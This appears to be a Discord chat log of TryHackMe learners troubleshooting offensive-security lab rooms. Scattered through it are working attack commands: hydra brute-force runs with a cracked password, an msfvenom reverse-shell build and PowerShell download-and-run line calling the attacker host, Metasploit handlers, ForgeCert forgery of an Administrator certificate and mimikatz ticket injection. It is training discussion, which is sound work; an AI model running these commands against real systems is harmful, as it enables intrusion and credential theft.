https://prnt.sc/dKMMhxK7xxKr

https://prnt.sc/DrOV-uAYRgmT

And do you know what your system is?

the print screen now is x64

sounds really wierd.

i had som issues but that was corrupted files.

i tried it on kali linux physical and kali linux vm and windows 10pro 64bit

but on windows 10pro 32bit it opened

what command did you use to download from ftp server?

hi. in the last part of the Game Zone room, in order to gain a root shell in metasploit (using module exploit/unix/webapp/webmin_show_cgi_exec and payload cmd/unix/reverse), it was needed to change the parameter SSL to false. does anyone know why is it?

The software isn't running on HTTPS

So you need to tell metasploit not to talk https to it

got it

thanks @keen iris

Gave +1 Rep to @keen iris

hello jedis

I am here forever!!

Anyone who can help me troubleshoot why https://www.internal.thm/blog/wp-admin/ in the room Internal isn't loading?

If I complete thus path and the pentest+ preparation exam, will I know enough to pass the exam?

hi guys i am having a problem in brainstorm room for bufferoverflow

i have tested the chatserver.exe and the script run perfect on local ip and i get a shell
when i change the script to my target machine ip i dont get a shell very weird any suggestion? i tried to restart the machine 2 times and still same

nvm worked it was the openvpn problem!! thank you guys

Wich exam are you thinking about?

The pentest+ lol

I dont think so. I think you need a lot more knowledge then what you can get froom just completing this Path and pen test prep.

Having an issue with hydra in Skynet room. No matter what I set the failed login response to my results are all valid.

The log1.txt file has the correct password for milesdyson email account.

wait i done this room i think i can help u

this room u dont need hydra it dosent work u need this
searchsploit -m php/webapps/25971.txt

anyone come across this problem. I think it is server side, but im not certain.

┌──(root㉿kali)-[/home/leigh/Downloads]
└─# telnet 10.10.129.25 3389
Trying 10.10.129.25...
telnet: Unable to connect to remote host: Connection timed out

┌──(root㉿kali)-[/home/leigh/Downloads]
└─# xfreerdp /u:admin /p:password /cert:ignore /v:10.10.129.25 /workarea
[11:02:45:378] [96039:96040] [ERROR][com.freerdp.core] - freerdp_tcp_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_FAILED [0x00020006]
[11:02:45:379] [96039:96040] [ERROR][com.freerdp.core] - failed to connect to 10.10.129.25

is your vpn connection good?

It’s all good now, I found some code that fixed the issue

: sed -i 's/cipher AES-256-CBC/data-ciphers AES-256-CBC/' *.ovpn

yes this is what i mean

Yeah, thanks, so all good. I didn’t realise it was that initially, just the ovpn being wrong, till I actually read what was happening

its happen to me too last time

I used burpsuite to breach the login screen. Hydra wasn't working for me like normal. My problem is I don't understand why hydra isnt working here. I've tested and researched on my own no luck.

I think the syntax is wrong can u please share so we can help u?

c

Hydra -l milesdyson -P log1.txt 10.10.37.39 http-post-form "/squirrelmail/src/login.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:ERROR Unknown user or password incorrect."

Acts like failed login response is incorrect. Shows entire wordlist as valid password.

Anyone having issues try to ssh to THMJMP1 in Breaching Active Directory room? I can’t even ping the host and I’m using THM attackBox

If i am not mistaken your error message is wrong. When i get false positives on hydra http-post-form methodes i try to change the error message.

i have problem in room Persisting Active Directory

Task 4 Persistence through Certificates

when i put the code the terminal freeze i think there is a bug i tried it many times and i reset everything

C:\Tools\ForgeCert\ForgeCert.exe --CaCertPath za-THMDC-CA.pfx --CaCertPassword mimikatz --Subject CN=User --SubjectAltName Administrator@za.tryhackme.loc --NewCertPath fullAdmin.pfx --NewCertPassword Password123

└─# hydra -l milesdyson -P '/root/logs1.txt' 10.10.138.78 http-post-form "/squirrelmail/src/redirect.php:login_username=milesdyson&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:Unknown user or password incorrect."
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-24 12:12:33
[DATA] max 16 tasks per 1 server, overall 16 tasks, 31 login tries (l:1/p:31), ~2 tries per task
[DATA] attacking http-post-form://10.10.138.78:80/squirrelmail/src/redirect.php:login_username=milesdyson&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:Unknown user or password incorrect.
[80][http-post-form] host: 10.10.138.78 login: milesdyson password: cyborg007haloterminator
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-01-24 12:12:37

host: 10.10.138.78 login: milesdyson password: cyborg007haloterminator
http://10.10.138.78/squirrelmail

did u update ur dns?

i cannot continue my lab something is wrong with this room!!!!

Yeah, I did.

systemctl restart NetworkManager

and after try to nslookup and ping ur host

If you restart the network manager, you'll need to update the nameserve.

he have to put it manual since his doing the ad room

I have a question about relevant room the victim os is windows 2016 why eternal blue is not working? I know it is not the solution of this machine but i want to know the reason

https://support.microsoft.com/en-us/topic/ms17-010-security-update-for-windows-smb-server-march-14-2017-435c22fb-5f9b-f0b3-3c4b-b605f4e6a655

Thank you for your help. 😁

Gave +1 Rep to @odd stone

I lost internet for a moment before I could finish that thought. That machine appears to have the patch applied to it, I have fever dreams occasionally of the mad scramble applying that update to a large number of servers in a short amount of time in my internship.

Anyone tried 'Internal' lately?

internal.thm/ isn't loading

I did open a ticket, thought I'd ask here too

anyone know why my nessus scan isn't getting results? I installed Nessus on my kali linux VM and ran a scan targeting the TryHackMe machine, and nothing is outputted.

😮 let me try that

Um I've entered the IP address, not the words internal.thm

It resolves to internal.thm and throws an error

I'll try and report back 🫡

Did you figure it out? I'm having the same problem (Nessus room - https://tryhackme.com/room/rpnessusredux) for both scans, basic and web.

make sure you guys are connected to the tryhackme vpn, try ping 10.10.10.10 or use ip addr and check tun0, it must be the same ip address shown on the tryhackme page if you are connected
remember to start the nessusd.service using sudo systemctl start nessusd.service and on your browser, go to https://127.0.0.1:8834 (127.0.0.1 is the loopback ip and 8834 is the default nessus port)
and on the target you must add the target ip address, but first, ping it to see if you can communicate with it
if the target machine ip isn't responding, try restarting it
if it is still not working regenerate your .ovpn file or switch server
also, check if your firewall is blocking the connections (linux default firewall [ufw] configuration is to deny all incoming connections and allow all outgoing connections, check the status with sudo ufw status, you can allow or deny using sudo ufw allow/deny port/protocol
as example, when i was trying to send linpeas.sh (a privilege escalation bash script) to the target machine using python http.server:
i needed to allow the connections on port 80 using the tcp protocol: sudo ufw allow 80/tcp

Is there an issue with the Alfredo box? The last meterpreter shell just won't pop up

ALSO (Nessus room) IS NOT WORKING FOR ME

Just lost an hour and a half cause my PowerUp.ps1 wasn't working on the Steel Mountain machine. I've uploaded the file correctly but instead of typing . .\PowerUp.ps1(there's a space between the dots), I was typing without the spaces. Just posting here if someone have the same problem in the future when trying to run Invoke-AllChecks

Thank you - that did it for me! I probably had forgotten to connect to the vpn - I was able to run through the verification steps you listed this time, and that is handy.

Gave +1 Rep to @ornate crow

nice nice

anyone did gatekeeper recently

?

i'm trying to crash the app but every script i use is not working

i'm thinking its the windows setup i'm using... using windows 11

windows 8 not starting the application

anyone got link to download windows 7 or lower?

anyone here already did https://tryhackme.com/room/bufferoverflowprep ??

yuups

I am stuck on oscp.exe - OVERFLOW1

I already got the flags, no problem with that. Just when I am injecting the payload in executable it crashes

I believe it might be something to do with stack padding

uuuum well not sure there

most of them shadow skipped making them run a shell

and just got the flags

not sure what the issue is if you are trying to get a shell but don't

might be because the pointer that you overwrite needs to be in reverse order in your exploit script

i.e big edian vs small edian

I followed the program flow and the jump is alright. When I jump everything is ok, but then my code has "fstenv" line that breaks everything

maybe try add some padding i.e nop bytes before your shell code in the exploit script

I jump to the Stack Pointer and the Stack is all filled up with my code, but right after the "fstenv" everything breaks up and the stack get messed

very hard to figure out what is going wrong so shadow is just guessing and trying to help

yep, I know

I've already done some buff overflows and never had this problem

at least you can finish the room ¯_(ツ)_/¯

lol, yep

this is right after the jump and after bypassing the NOPs for padding

and this is the code already broken

sry, the resolution is a crap

i did

is this path aka the oscp learning path within thm?

yep.. and I found my problem, it was just python syntax

Nice I am doing HackPark within that path right now

Hi everyone, i am stuck at the Content discovery Task 2 - robots. The machine won’t open after opening AttackBox . I did wait for 5 minutes before clicking on it.

Hello everyone, I'm stuck at steel mountain privilege escalation, the script is not working on the target system, what could be the problem?

! docs verify

!docs verify

These are the pictures

I'm trying to get the "Power Up. ps1 to load but it's coming up with errors

How do i get the script instead of the html page?

I used 'wget <link>'

I've got it! thank you so much @hidden shoal

Gave +1 Rep to @hidden shoal

Hi everyone, not sure if i am in the right room. i am stuck at the Content discovery Task 2 - robots. The machine won’t open after opening AttackBox . I did wait for 5 minutes before clicking on it.

I'm working my way through Internal right now, I have access to Jenkins and can run commands but none of the reverse shells I'm using are working. I can ping both the THM machine and myself but for some reason the shells aren't connecting. Am I on the right path? Do I even need a shell in Jenkins?

I've tried metasploit web delivery with bash and python and the common bash reverse shell. I found it though, didn't actually need the shell. Not a big fan of this CTF either, I spent a lot of time enumerating and trying things when the answer was actually just too easy

Hey everyone, I'm doing the Kenobi room, the second question of task 1 is how many ports are open, it seems like the answer is set to accept only one digit, but my nmap report says there are 11 ports open, any idea of why this is happening?

I think you should use a different scan syntax, maybe -sS

Please, I'm stuck here, Steel Mountain privilege escalation. The problem is that the listener isn't picking the payload for the ASCService. exe, what can I do?

hey guys, has anybody had issues with the alfred CTF on the offensive pt path? the machine seems to be down 15 minutes after starting it. I'm definitely connected via VPN, so what gives?

never mind, figured out the issue 🙂

i think in my opinion you must first stop service before trying to overwrite then a bit of luck you should get your reverse shell

Hi guys, do anyone getting difficulties in this path, I hope i am not the only one 😔

To make this easier to find: Alfred meterpreter session is not valid
Hey I'm having significant issues with the Alfred CTF, my meterpreter sessions keeps dying nearly instantly, here's what I've tried so far:

(This is based on a walkthrough, which also did not work)

LHOST (=tun0)=10.10.212.70
RHOST=10.10.41.133

create payload using:
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai EXITFUNC=process LHOST=10.10.212.70 LPORT=9001 -f exe -o revshell9001exit.exe

serve payload using: python3 -m http.server 8000

And executing the following through the Jenkins web app:

powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.10.212.70:8000/revshell9001exit.exe','revshell9001exit.exe')"

Following this, I set up the exploit/multi/handler using

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.212.70
set LPORT 9001
run

Then I start my reverse shell process through the jenkins web app using:

powershell Start-Process revshell9001exit.exe

However this leads to the following output (see screenshot):

I cant post screenshots, hence I'm including the output as code:

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.212.70:9001 
[*] Sending stage (175686 bytes) to 10.10.4.133
[-] Meterpreter session 1 is not valid and will be closed
[*] 10.10.4.133 - Meterpreter session 1 closed.

I'm likely missing something dumb here, though I've seen earlier reports of users' meterpreter sessions not connecting properly, though the workarounds for that dont work for me :(

edit: I got the web_delivery method working, although I'm still interested in why the above method did not work :(

i have the same probmlem here cant figure why if you figure ant thing out please inform

Working on the Alfred room. Anyone has a logic on how the route in was through the Windows Batch command? It's not documented anywhere in Exploit-DB that that's a vuln. Also, I managed to get https://www.exploit-db.com/exploits/49244 to work, but couldnt get any foothold from that. Is there a reason why https://www.exploit-db.com/exploits/49244 didnt work?

u need to login and make inside msfvenom and build it

Need some help if possible please. I am currently doing the Internal Pentesting Challenge, and I am at the stage of trying to brute force the jenkins login. My problem I am running into is the socket you have to set up to access the site runs on port 8080 so when i attempt to catch the page in Burp or Zap it does not work. I have tried changing the proxy port of Burp and Zap to a different port however I get the issue in the image.

@covert scarab

:hammer: Blacko#4775 has been banned.

after slacking for a few months I got back in the mood and finished the jr-pentester path, I'll probably go with the offensive pentesting path next, but what are the differences with the red teaming path? For what are both paths? What do they prepare you more, what is their difference in focus and goals for choosing either?

What's a non msfvenom method

Also, I'm using burpsuite intruder against a the 'Skynet' box. I believe I'm getting rate-limited after 8 tries cause everything is timing out. Is this a Burp restriction or THM's?

@proud silo under steel mountain challenge, under the access and Escalation without Metasploit, the CVE script keeps saying there is an error? any solution to this?

That's a bot

have you checked the script at the line & position where it errors out?

Oh! Thank you

Gave +1 Rep to @finite pivot

Yes, I checked for indentation error, it's a python script which I'm good at

https://github.com/aokiji-zz/pentent-tools-electron-react

guys, i really stuck how to connect active directory network i setup the dns server and it didn't resolve THMDC.local anyone help!

Can you ping the DNS server?

no, but i think it blocked becuase i used nmap without ping i says it's the host is up

Which room are you doing?

breaching active directory

Are you in the attackbox or VM

in attackbox it is working fine but the problem is in kali vm

im solving the hackpark room
i also got the passwords via hydra but none of them are working

"The passwords" sounds to me like you're doing something wrong. You shouldn't have multiple

i got it there was some problem in the query

but now i have another problem i have uploaded the exploit , when im trying to access the url given in exploit im getting this

anyone?

still here?

@eternal timber pm me and I’ll help you, I was having a similar issue

I was working in "Exploiting Active Directory" room and lots access suddenly. Tried with VPN, AttackBox and Kali after that but no communication with 10.200.60.0 network. Can someone please reset the room? Need only one vote.

Can not ping DC or any other machine from AttackBox

well you can place one reset vote every 30 mins.... also there are multiple networks with different subnets at least you mentioned you'res so people could reset it

Thanks

Gave +1 Rep to @vernal mason

Can anyone please help, getting this error "mimikatz # kerberos::ptt TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_wsman~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi

• File: 'TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_wsman~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi': ERROR kuhl_m_kerberos_ptt_file ; kull_m_file_readData (0x00000002)

While importing TGS tickets using mimikatz

This is for "Exploiting Kerberos Delegation" room

I am login with T2 Admin (t2_lawrence.lewis)

Buffer Overflow Prep, task #2,

Run the following command to generate a cyclic pattern of a length 400 bytes longer that the string that crashed the server (change the -l value to this):

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 600

Except there is no "metasploit-framework/tools/exploit/pattern_create.rb -l 600" in /usr/share

The writeups say to use

msf-pattern_create -l 2400

but that command cannot be found

What am I missing?

I can be reached here: bigdeal@w01fguard.com

hi, i have a problem in Steel Mountain room: at the last question of the second task, i have to copy paste the flag user.txt. The problem is when i type "cat user.txt" in the meterpreter console, it show the file content but there is two uncorrect caracters. When i copy paste to thm, it look like " \ufffd\ufffd ...". I see with Google it's a problem with unicode. Someone can help me because i am stuck at this step

drop into a Windows shell with shell and run type flag.txt

ok thx

If I start the AttackBox from the room Breaching Active Directory then it's supposed to connect me to the AD network automatically but it's not doing that, what am I missing?

There isn't, but you can download it directly from GitHub, see below:

wget https://raw.githubusercontent.com/rapid7/metasploit-framework/master/tools/exploit/pattern_create.rb

chmod +x pattern_create.rb

Then just run the following on your AttackBox, this is what I did:

./pattern_create.rb -l 2400 (or whatever length you have)

did you run the DNS setup command?

Any guess why this is showing this error Its OffensivePentesting SteelMountain Room without metasploit cve-2014-6287.py , I started python http server to serve nc.exe and than modified code with lhost and port set and nc listener in attacker machine when i ran this .py file it showed me this error.

it's interpreting \U at the start of the vbs string as unicode https://bobbyhadz.com/blog/python-unicode-error-unicodeescape-codec-cant-decode-bytes#the-3-possible-solutions-to-the-error has a few different ways to fix it

It's not that, I don't even have that interface, someone recommended stopping the AttackBox, leaving the room, coming back to the room, and starting the AttackBox again... we'll see if it helps, I hope so tho lol

it doesn't show a breachad interface when you check the ipconfig? 🤔 yeah I'd try restarting the attackbox and hope that works. I've just double checked from my attackbox and it was working fine 🤞

grumbles about #hackpark PostView exploit not working.

And suddenly, there it is x'D

I try to get my kali VM connected to the breached AD network. But open vpn just gives me this error message : Error: problem with tun vs. tap setting. Anyone know what to do?

You need to edit the VPN script, where it says

dev breachad change it go dev tun

Thank you.

Gave +1 Rep to @finite pivot

hi

friends I downloaded network openvpn in AD room but it doesn't work on my physical machine .ovpn does anyone else have problems with this? is there a solution?

If you want you can DM me and we can try to solve it. 😊

response messege marle

I sent you the problem privately, I couldn't solve it, I wonder if it's caused by your system, really.

Responding you here also, to state out publicly that I am not staff, but a subscribed user / customer on THM. I do not mean to implicate being a staff person in any way. Apologies also here for neglecting to mention that I am only a regular user. :)

@lavish trail çözdük kanka problemi burası güzel aktif kullancam bundan sonra

do you mean you config file .ovpn . Whats the error message ?

English only on this discord server please

this server is english only , please

i see how it is @dense gate , steal that valor while I'm at work 🙂

Keep working, I'll handle it 😄

I am on Task4 in Breaching AD. When i set up my rogue ldap server it dosen't give me the option to choose MDB for my database. Also I follow all the steps and when i check my if my rogue LDAP server's configuration has been applied, i just get: dn:

Nevermind I got the password. I just can't read

Hey guys i´m doing Hackpark rn got meterpreter session and try to enumerate the system with winpeas. Is it normal that it sometimes hangs for half a minute or so?

Good evening

guys anyone know how to make burpsuite catch the request of localhost
issue in internal room jenkins service

i changed the :
about:config
network.proxy_hijack..... to True
but its still not working

Ugh, too sleepy for buffer overflow techniques. falls asleep

its not in pwk anymore sadly

It's in PWK, but not guaranteed in the exam, no?

they removed it from the exam if im not mistaken

The exam is OSCP, the course is PWK, so it's still in PWK

its also removed from the course

I'm probably really late to the party, anyone else having issues with Retro? The intended path isn't working as expected ||I'm talking about CVE-2019–1388, and using the hhupd.exe in the recycle bin|| I know this isn't the only path, but it's the most obvious one.

Eventually I managed to find another way, but I was wondering if anyone else ran into issues with ||trying to get into IE and saving the file to be able to launch it in cmd, I couldn't even get IE to show up as an application|| anyway, just putting that out there.

On another note ||I learned how to use Juicy Potato properly, I've been meaning to look into that, just didn't have the chance yet||

hey guys
anybody else got this problem before?
I've conclued these topics, but it's look like I'm still need to finish something...

it's not possible to share print here 🥲

https://tryhackme.com/room/vulnversity

this one

when I come back to the dash, "vulnversity" is not completed yet

Refresh your webpage, clear your cookies, also I completed that one as well and I'm having the same issue, might just be a temporary bug but it shouldn't prevent you from printing your certificate at the end of the learning path, everything is okay on the back-end.

thx ✌️

Gave +1 Rep to @novel moon

In Enumerating AD Task2 How do I start MS SQL Studio from that command prompt?

anyone can help me in vulnversity room?

I din't find the answer in the last question

You can list all the SUID files and then look at GTFOBins if there is a binary amongst the found ones which can be abused. :)

i have a bug i think

i have complete vulnversity a few weeks ago, but today it's not terminated

but i have all the answers

It's a known issue, they're working on it #1092490706385383524

thx

Same problem for me

#1092490706385383524 they're working on it

Thanks a lot 👍🏻

Aside from the Offensive training paths are there some other rooms which you guys might recommend as practice for the OSCP certification? I'd like to go through a bunch before the exam

Hey everyone, does someone know, why it doesn't in Steel Mountain it doesn't connect to my nc listener?

it downloads nc.exe, but when I run it a second time, it doesn't connect to my listener. I've tried it with both port 4444 and 443

Is it a binary file? Try to discovery the number port using the Radare2 or gdb.
It's probably the port isn't correct

yes, ncat.exe is a binary file and the link to it was provided by author. Never worked with binary files before or used the tools you mentioned, but I'll try to figure it out! Thanks for the input !

Their advice is a little misleading, as it's ncat which is well known. Just have a look at what port it's meant to send the shell to, within the script

Hey Coy, could you tell me how you managed to get it to work? I'm having the exact same problem at the moment and I'm super confused, why the connection dies instantly....

I used the web_delivery method

That worked. thanks! Did you every find out why the standard way didn't work?

Gave +1 Rep to @undone flint

I just ran into this myself, the CVE isn't working

Use ||juicy potato||, that worked for me

cheers. I eventually found a CVE from 2017 that worked

is the learning path valuable if we want to pass the OSCP ?

Or not valuable enough and it's better to work on OSCP course only ?

I think it is valuable, especially the buffer overflow section, it's pretty much what you would do on an exam

Thank you @fleet wedge 🙏

Gave +1 Rep to @novel moon

they dropped buffer overflow from the new OSCP. but as 🤑 as the OSCP is I would think it's worth doing this learning path first to have more experience before you jump into the limited OSCP lab time.

What? They dropped buffer overflows? You know how long I've been studying for that

yep, they dropped buffer overflow from their new updated class material so they dropped that machine from the exam https://help.offsec.com/hc/en-us/articles/12483872278932-PEN-200-2023-FAQ "The OSCP exam is not changing as part of the update, with the exception of the removal of the independent Buffer Overflow machine from the exam."

may you one day use your buffer skills out in the real world and feel vindicated

Can someone help me?!
I stuck at Lateral Movement room in Task5
I used mimikatz to take users NTLM hash.
According to first screenshot from website I should receive shell, I receive, But There is no flag.exe on desktop to finish Task 5

I have a rather embarrassing question: I'm doing Skynet right now now and I got the Password, which I want to use to log into the SMB client, but I simply can't type in the characters ^ and ` in my Linux machine. I've been trying all kinds of things for more than an hour and feel like I'm wasting so much time...

I've also tried pasting it, when it asks for the PW, but that doesn't seem to work too

Btw, I've got a german Keyboard

Supposedly the characters are here on a German keyboard layout

Have you tried ctrl+shift+v for pasting

Hi @dense mist , that's right, the characters are there, and I can type them here without problems ^^ ``, but on the VM it simply doesn't work and I can't paste the password with ctrl+shift+v, because it doesn't accept it when pasting it :/

Does the VM perhaps use a different layout?

I also changed the keyboard settings on the linux machine to fit my layout

Ah okay, that answers that

Super confusing...

Does it paste it into the command line at all or it doesn't work no matter what?

Cause if it lets you do that, you could specify it in the command -U=user%password

I actually tried to use "smbget" instead of logging in, and there it let me paste the password. So I've got the files now. Still super weird why it doesn't let me type those characters...

I had the same exact issue and what i found was the solution was to double check how I dumped the sam and system files. It turns out I saved the sam-reg as both the sam and system and that was why it wasn't working

i double checked the way I saved the sam-reg and system-reg and then it worked. Turns out I was saving sam-reg to both sam and system

hello everyone i'm doing the hack park module i have to force the login of the website with hydra but my command doesn't work if someone can explain me what's wrong

I had the same issue but on another language, what finally got it working was using keyboard model Macbook/Macbook Pro as keyboard model, then language(macintosh) as layout. Im using Kali inside parallels desktop on Mac

Will try that out, thanks!

Gave +1 Rep to @restive dock

hi, can someone tell me what is the os in the video on Hack park room ?

It's just Kali Linux

ok, he have custom kali

Pretty sure it's just an older version, the video is 3+ years old

he just have a beautiful kali, not like mine

What path should I pursue next the Red Teaming or Offensive pentest? I just finshed the JR pentest

Offensive pathway

After offensive then the red teaming

For Task6 of Hacking with Powershell, the question asks: "How many open ports did you find between 130 and 140(inclusive of those two)?" Based on my script, it would seem to me as though the answer would be 1 since only port 135 has a TCP Connection Succeed True. However, the answer is 11, which appears to be because 11 ports inclusive of both 130 and 140 (i.e. 11 ports are 130,131,132,133,134,135,136,137,138,139,140). I don't understand why all of these ports are considered "open." Are they "open" just because PingSucceeded is True even though for all of them except port 135, TCPTestSucceeded is False?

i am at the Overpass2hacked room, and tried to answer the question "Using the fasttrack wordlist, how many of the system passwords were crackable?". i used john and the wordlist mentiond but i only find 2 passwords. apperently the correct answer is 4. is also checked some writeups bud i do not find what i am doing wrong. anybody has an idea?

hi i have a problem in HackPark room: i have generate an exec with msfvenom to do a reverse shell. I have already download it in the windows machine, and set my listener in metasploit

but when i run my exe file in windows machine, it works, but my listener show an error:
[] Started reverse TCP handler on 10.10.204.106:9999
[] Sending stage (175686 bytes) to 10.10.59.112
[-] Meterpreter session 1 is not valid and will be closed
[*] 10.10.59.112 - Meterpreter session 1 closed.

and if i retry, its always the same problem

someone can help me ?

@drowsy zinc Have you (double) checked that the payload certainly is of same type as the generated exec has? :)

i have create a shell with this command: msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe

and i have replace lhost and lport by my ip and 9999

on other room, it's always work 🤷‍♂️

Seems, that you are not using Meterprete ras payload, though it is configured for listener. If I look at this correctly.

i think it's okay, but im not sure

The payload you used to generate the executable ( windows/x64/shell_reverse_tcp isn't same as Meterpreter which you have told the listener that the payload is. ( I'm tired but 95% confident that it is not). :)

oh ok

so i have to create another exe file with msfvenom ?

or change the payload in msfconsole ?

Well, here you have two options:

1. If you're happy with a basic reverse shell ( which is not Meterpreter), you can "let the listerner know" that you're using payload windows/x64/shell_reverse_tcp -> That way the listener will catch the arriving shell and treat it correctly (not trying to force the Meterpreter main payload through the connection).

2. Other way, you can generate a new exe file using a payload that matches the listener.

If you really want Meterpreter, go with option 2. If you're comfortable with a trad reverse shell, go with option 1. :)

ok thx (sorry for my bad english, im french 😅 )

You're welcome, do say if you can't get it working. And to me your english seems fine! :) Magnifique!

thx

@drowsy zinc Sure, happy to help. :)

Am doing the relevant task now. After scanning with nmap, port 49663 doesn’t show up in my scans. Am only just finding out after reading walkthroughs. Anyone experienced this???

What was your command when you ran your scan? And what tool did you use?

Nmap -sC -sV -p- ip address

That's odd. It should have been captured. Did you try to run your scan again to see if it will be captured?

Don’t quite get you

sometimes ports take time to open because of the service on said port is slow starting

Sorry I meant again

I have ran the scan 5 times or more

try restaring the target machine and wait 15 mins for it to start fully

then rescan the new machine

Will try that again

anyways a -p- port scan with nmap will take a while as there is after all 65 000+ ports

Yeah am used to that.. about 800 secs or more

Sometimes 1000 secs

For scanning all the tcp ports, try using rustscan. Doesn't take more than 1-2 mins to find everything open. Service and script scans after that take longer.

sigh rustscan is not needed if you use the right nmap options

my silly mistake was not running the scan with root privilege. i just tried sudo nmap ....... and boom it popped up.

thanks for the suggestions.

Gave +1 Rep to @vernal mason

rustscan is basically just increasing the min rate and some other smaller options to scan faster

Been having sleepless night cos of this buffer overflow room

Can’t get mona.py to work on my windows with immunity debugger

I already have mona in the pycommands folder and when I try typing mona command it say pycommands: error importing module

Any help will be appreciated

For the Mr Robot box (extra credit section of Offensive Pentesting learning path), the Hydra seems to be a bit of a mess to get through. using it first to get username and then once username locked, it seems to not really give password using the fsocity.dic as a list

It looks like I am not the only one having this issue of it taking ridiculously long. I have what I think is the same as what they use in the walkthrough and still a 75hr wait for the password. I decided to just use the password result told to us in the walkthrough and solve the rest of the box because 75 hours (if it was going to take that long, unless I'm doing something completely wrong) seems like it's not going to work too well lol

is there something big I missed?

Am trying to copy the ma.db file in task 7 of the breaching AD and am getting this error after using the password. Don’t know what am doing wrong

see #1092490706385383524 around the vulnveristy and path cert issue

you probably just have to go into vulnveristy and answer a single unanswered question if the fix is anything to think about

Thank you buddy

Hi, Does Offensive Path still valid if you are preparing for OSCP? Cause they have removed Buffer OVerflow from the exam?

Doesn't mean the rest of the path is invalid

Yes, I will be doing the other labs.

also does not mean that knowledge of buffer overflows has no use anymore

Hi guys and ladies. Going thru Vulnversity tasks of path and found strange answer to the question on task "Locating directories using Gobuster". The answer is || internal || but seems it's impossible to determine from Gobuster output. I rather think that answer should be || server-status || regarding to the different status code of answer. Can someone explain why the correct answer was like that?

Server-Status is a standard Apache path that always exists but is usually configured to be inaccessible to you. internal however does sound spicy and the 301 code is not bad, it just tells you the site moved (probably from /internal to /internal/)

It’s like finding a directory called “secret” but a bit let obvious

Of course a server status page could also have some interesting vulnerabilities especially regarding logs or command injection, it just happened to not be the case in this example and the internal path looks like a low hanging fruit

The question was "what directory has and upload form page?" (expecting RCE in the next task) and I'm not sure Gobuster output answered it. Maybe I didn't finish the exercise correctly?

Gobuster itself would not answer such a question for you, it just gives you some websites you can manually browse and check out

Thank you

What is the problem with this?

Invoke-AllChecks isn't working

Can someone explain?

you didn't use the previous command correctly

the "." operator in powershell means "include this file", you basically called a functionality without including it first

using "." for that is not very intuitive if you ask me, but oh well

Thank you

Gave +1 Rep to @silk vale

any of yalls use Evil-WinRM often?

Yup

How exactly do you download/upload with this thing? I've been trying to use the commands and I'm not sure where in the hell the files get downloaded or uploaded

Providing absolute paths and nothing happens

Just wondering if there's some hidden default directory for that

ye, its " . .\ "isn't it, from what i recall?

wondering so i don't make that mistake

just figured out its probably because i lack permissions to do it

man does EvilWinRM not show that

Hi guys and ladies. Going thru Vulnversity still just finished task about compromising server. Strange part is what I got 200 OK from server disregarding extension of shell I'd like to payload. Maybe it's ok not so bad anyway but where's more of strange things. The most strange thing is that path to uploaded file provided in the task. It doesn't seem like close to the real world. So how can I guess file location where shell will be loaded and can be accessed?

I think you'd have to hope to find the right folder doing recon by using tools like ffuf, gobuster, etc. to look for what folders and files are accessible. I had the same thought after I did it, and I managed to find the uploads folder location using a dirb scan ( dirb http://IP:port /usr/share/wordlists/dirb/big.txt -R) and setting the -R recursive flag so that when it finds a directory it then checks to for subdirectories as well.

@silk vale if I understand correctly said that Gobuster isn't suitable for URL identification so now I'm not sure about Gobuster.

Actually now that I think of it, Gobuster wouldn't have worked here because it doesn't search recursively.

If we drop recursion issue and assume that site have only one level of folders will Gobuster help?

it should do- it uses brute force testing to try to find available files and folders. Personally, these tools are all ones I need more practice with - I often either get loads of errors (ffuf) or find them really slow (dirbuster). gobuster and ffuf seem to have better reputations for speed, but I haven't used any of them extensively enough to have my own opinion on that.

Thank you @indigo ember

Gave +1 Rep to @indigo ember

hi, i need help for skynet room for the second question: What is the hidden directory ? I have run gobuster and i've find /squirrelmail, but it's not the good answer. Can someone tell me why ?

ok, i have find the answer, sorry for disturb

Hi guys and ladies.
Seems I found useless step in Blue room. It was proposed to change shell to Meterpreter after using exploit but in fact default shell for Eternalblue is Meterpreter now. So we have useless step in this room.

Hi, i have a question, i am doing linux priv esc path. i am in nfs section. I got the idea and logic. i can mount the nfs on attacker machine, write a c code and build that run bash with root priv. But can i write a bash script to priv esc too? it doesnt work with root priv when i try. I have tried writing sudoers files to karen username or copying bash binary and giving it suid.

is there an example poc priiv esc for nfs section which written with bash script, now compiled c code of msfvenom

I have tried writing sudoers files to karen username or copying bash binary and giving it suid. That would work
But can i write a bash script to priv esc too? That would not. Suid doesn't work for scripts, the interpreter would need suid